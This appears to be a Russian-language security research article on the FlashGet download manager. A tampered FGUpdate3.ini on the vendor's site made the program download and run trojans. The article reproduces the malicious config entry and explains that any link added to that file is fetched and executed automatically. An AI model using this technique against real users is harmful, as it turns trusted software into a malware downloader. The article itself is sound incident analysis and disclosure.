Исследование

TrojanGet

Несколько дней назад мы начали получать сообщения от пользователей о том, что на их компьютерах антивирус стал обнаруживать троянские программы в каталоге популярного клиента-загрузчика FlashGet.

Анализ ситуации показал, что проблема существует у пользователей этой программы по всему миру. Основными симптомами является появление в системе файлов с именами inapp4.exe, inapp5.exe, inapp6.exe, детектируемых Антивирусом Касперского как Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezo и Trojan-Dowloader.Win32.Agent.kht.Ситуация выглядела очень странной, т.к. никаких других троянских программ, через которые они могли попасть в систему, не обнаруживалось. У некоторых из пострадавших пользователей были установлены все патчи для операционных систем и браузеров. Каким же образом вредоносные программы проникали в компьютеры?

Наше внимание сразу привлекло месторасположение троянцев — каталог самого FlashGet. Проверка выявила, что кроме троянцев свежую дату создания и модификации имеет файл FGUpdate3.ini (синим цветом выделены отличия от оригинального файла):

[Add] fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031[AddEx] [fgres1.ini] url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif] url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe] url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Странно, но ссылка на файл inapp4.exe, являющийся троянцем, вела на настоящий сайт FlashGet. Именно оттуда он загружался в виде appA.cab.

Никакой информации об инциденте на сайте FlashGet обнаружено не было, зато изучение форума пользователей программы выявило множественные сообщения (http://bbs.flashget.com/en/viewtopic.php?f=15&t=9763) о случаях заражения и полное молчание со стороны разработчиков.

Судя по информации, найденной нами в сети, первые случаи заражения были зафиксированы еще 29 февраля. Последний известный нам — 9 марта.

10 дней легальная программа выступала в роли троянца-загрузчика, осуществляя установку и запуск в системах пользователей троянских программ, размещенных на сайте компании-производителя!

В настоящий момент троянцы уже удалены с сайта, а FGUpdate3.ini (который также загружается из сети) приведен в исходное состояние.

Способов, при помощи которых FlashGet может быть превращен в троянца-загрузчика, нам видится два. Первый из них самый очевидный — произошел взлом сайта компании-производителя, в результате чего злоумышленникам удалось подменить стандартный файл конфигурации на указывающий на троянскую программу, размещенную там же!

Почему хакеры не использовали другой сайт, мы не знаем — возможно, для лучшей маскировки (ссылка на сайт FlashGet в конфиг-файле может не вызвать подозрений). Мы решили проверить, можно ли использовать этот трюк для загрузки любых других файлов с любых других сайтов?

Ответ — да.

Достаточно добавить в файл FGUpdate3.ini собственную ссылку на что угодно и это будет автоматически загружено и запущено на вашем компьютере при каждом запуске FlashGet. Даже если вы не нажимаете кнопку «Обновить» — FlashGet самостоятельно использует информацию из ini-файла!

«Уязвимость» существует во всех версиях FlashGet 1.9.xx.

Это означает, что несмотря на то, что на данный момент проблема с взломом сайта FlashGet решена, уязвимость в системе пользовательской безопасности остаётся. Любая троянская программа может изменить локальный ini-файл FlashGet, заставив его работать как троянец-загрузчик — и это является вторым из двух упомянутых выше способов.

Стоит ли говорить о том, что FlashGet обычно относится пользователями в разряд «доверенных» приложений и ему позволяется любая сетевая активность и обращения к любым сайтам?

Официальной реакции от китайской компании-разработчика FlashGet на настоящий момент нет. Истинные причины произошедшего остаются неизвестными и никаких гарантий того, что это не случится снова, не существует.

Делайте собственные выводы…

TrojanGet

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Азиатские APT-группировки: тактики, техники и процедуры

Делимся с сообществом подходами, которые используют азиатские APT-группировки при взломе инфраструктуры, и подробной информацией о тактиках, техниках и процедурах (TTPs) злоумышленников, основанной на методологии MITRE ATT&CK.

Как поймать «Триангуляцию»

Эксперты «Лаборатории Касперского» смогли получить все этапы «Операции Триангуляция»: эксплойты нулевого дня для iOS, валидаторы, имплант TriangleDB и дополнительные модули.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике